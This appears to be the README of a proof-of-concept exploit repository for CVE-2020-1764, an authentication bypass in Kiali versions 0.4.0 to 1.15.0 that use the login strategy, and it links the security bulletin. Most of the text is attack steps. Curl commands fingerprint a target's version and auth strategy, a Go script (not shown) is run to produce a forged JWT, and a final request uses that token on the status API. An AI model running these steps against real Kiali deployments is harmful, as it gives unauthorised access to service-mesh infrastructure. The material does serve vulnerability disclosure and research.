Auth Bypass PoC for Kiali# CVE-2020-1764 PoC
Auth bypass PoC for Kiali 0.4.0 to 1.15.0 using login auth strategy ([Security Bulletin](https://istio.io/latest/news/security/istio-security-2020-004/))
check version: `curl 'http://<IP>/api`
check auth strategy: `curl 'http://<IP>/api/auth/info'`
`go run ./poc.go`
`curl 'http://<IP>/api/status' -H "Authorization: Bearer $JWT"`
[4.0K] /data/pocs/3dcf4c9a485f2d322bc17d23e447648e9ee2d6fc
├── [ 424] poc.go
└── [ 356] README.md
0 directories, 2 files